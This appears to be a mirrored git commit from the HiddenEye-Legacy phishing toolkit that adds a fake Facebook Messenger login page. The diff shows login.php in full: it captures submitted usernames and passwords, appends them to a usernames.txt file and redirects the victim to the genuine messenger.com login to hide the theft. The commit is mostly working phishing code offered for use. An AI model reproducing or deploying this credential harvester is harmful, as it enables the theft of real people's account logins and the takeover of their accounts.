mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
added new fb messenger
This commit is contained in:
parent
e1ded15214
commit
95236efade
34
WebPages/fb_messenger/index.html
Normal file
34
WebPages/fb_messenger/index.html
Normal file
File diff suppressed because one or more lines are too long
14
WebPages/fb_messenger/login.php
Normal file
14
WebPages/fb_messenger/login.php
Normal file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://messenger.com/login.php');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
Loading…
Reference in New Issue
Block a user